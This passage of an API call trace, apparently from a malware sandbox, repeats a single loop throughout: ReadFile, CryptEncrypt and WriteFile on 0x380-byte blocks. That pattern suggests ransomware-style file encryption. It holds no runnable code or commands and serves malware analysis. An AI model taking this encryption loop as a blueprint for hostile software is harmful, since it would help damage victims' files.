nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.806] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.807] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.808] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.808] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.809] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.809] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.810] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.811] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.812] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.812] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.813] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.813] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.813] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.813] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.813] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 